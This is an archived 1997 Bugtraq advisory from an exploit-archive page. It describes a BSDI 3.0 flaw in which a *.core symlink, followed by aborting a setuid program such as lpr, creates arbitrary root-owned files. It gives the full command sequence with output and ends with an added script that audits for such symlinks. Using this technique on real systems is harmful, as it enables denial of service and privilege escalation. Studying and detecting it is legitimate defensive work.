BSDI 3.x corefile problem
Description: BSDI 3.0 apparently allows any program to overwrite/create files through a core dump link.
Author: Nir Soffer <scorpios@CS.HUJI.AC.IL>
Compromise: Definitely DoS, possibly become r00t
Vulnerable Systems: BSDI 3.0
Date: 19 June 1997
Notes: Several people mentioned that he was wrong about overwriting files. If the mode is 0600, you CAN overwrite them. This includes a lot of files you might want to overwrite ;).
Date: Thu, 19 Jun 1997 20:42:33 +0300
From: Nir Soffer <scorpios@CS.HUJI.AC.IL>
To: BUGTRAQ@NETSPACE.ORG
Subject: Core file anomalies under BSDi 3.0
Well for starters, system information :
BSD/OS beep.cs.huji.ac.il 3.0 BSDI BSD/OS 3.0 Kernel #2: Mon Mar 31
13:39:46 IDT 1997 danny@sexta.cs.huji.ac.il:/usr/src/sys/compile/SEXTA
i386
A small and neat bug in BSDi 3.x allows people to arbitrarily write files
with crap for data, but not overwrite them. Like so:
Have a symbolic link, called [programname].core to desired file. Program
must be setuid root.
beep[ /tmp ] ls -la lpr.core
lrwxrwxrwt 1 root wheel 9 Jun 19 20:30 lpr.core@ -> /etc/TEST
beep[ /tmp ]
Just to make sure that file doesn't exist :
beep[ /tmp ] ls -la /etc/TEST
ls: /etc/TEST: No such file or directory
beep[ /tmp ]
Run program. (In our case lpr is convenient since it waits for tty input
and suspends itself.)
beep[ /tmp ] lpr &
[1] 27886
beep[ /tmp ]
[1] + Suspended (tty input) lpr
beep[ /tmp ]
Kill it with the ABRT signal.
beep[ /tmp ] kill -ABRT %1
beep[ /tmp ] fg
lpr
Abort (core dumped)
beep[ /tmp ]
And voila :
beep[ /tmp ] ls -la /etc/TEST
-rw------- 1 root wheel 184320 Jun 19 20:39 /etc/TEST
beep[ /tmp ]
This exploit is similar to the Solaris 2.4 core exploit - with a few
notable differences :
A.) BSDi doesn't give a damn that the euid!=ruid, so finding a setgid
program with privileges isn't necessary.
B.) BSDi _does_ however, check if the file exists, so it's quite
impossible to overwrite files.
C.) BSDi _does_ change the permissions of the core dump to 600, and it
keeps on being owned by root, so changing the file is impossible as well.
Regards,
Nir.
--
Nir Soffer AKA ScorpioS, scorpios@cs.huji.ac.il .
USER, n.:
The word computer professionals use when they mean "idiot."
-- Dave Barry, "Claw Your Way to the Top"
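The precondition for the write described in the post is a symbolic link named [programname].core sitting in a world-writable directory such as /tmp. The following audit script is an added example, not part of Nir's post or of any BSDI tool: it lists every *.core symlink directly inside a directory, reports whether the link target already exists (a dangling link is exactly the state the post uses to get a new root-owned file created), and sums them up over the usual scratch directories. It assumes a POSIX sh with readlink(1) available and that /tmp and /var/tmp are the directories worth watching; both are assumptions, not something the post states.

```shell
#!/bin/sh
# Added defender-side check for the BSDI 3.x core-dump symlink issue.
# Not code from the original post; assumes readlink(1) is present.

# list_core_symlinks DIR
# Prints "LINK -> TARGET [exists|missing]" for every symlink named *.core
# directly inside DIR. Prints nothing when there are none or DIR is absent.
list_core_symlinks() {
    _dir=$1
    for _link in "$_dir"/*.core; do
        [ -L "$_link" ] || continue          # skip real core files and an unmatched glob
        _target=$(readlink "$_link")
        if [ -e "$_link" ]; then             # -e follows the link: does the target exist?
            _state=exists
        else
            _state=missing                   # dangling: a core dump would create the target
        fi
        printf '%s -> %s [%s]\n' "$_link" "$_target" "$_state"
    done
}

# count_core_symlinks DIR
# Number of *.core symlinks directly inside DIR (0 when none or DIR is absent).
count_core_symlinks() {
    list_core_symlinks "$1" | wc -l | tr -d ' '
}

# audit_core_symlinks DIR...
# One summary line per existing directory, followed by the offending links.
audit_core_symlinks() {
    for _d in "$@"; do
        [ -d "$_d" ] || continue
        _n=$(count_core_symlinks "$_d")
        printf '%s: %s *.core symlink(s)\n' "$_d" "$_n"
        if [ "$_n" -gt 0 ]; then
            list_core_symlinks "$_d"
        fi
    done
}

# Assumed directories to watch; adjust to the sticky, world-writable
# directories on the host being audited.
audit_core_symlinks /tmp /var/tmp
```

Running it from cron and alerting on any non-zero count gives an early warning that someone has staged a link; on the affected release the only real fix is to stop the kernel from following symlinks when writing a core file for a set-id process, which the post itself does not cover.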
This page is part of Fyodor's exploit world.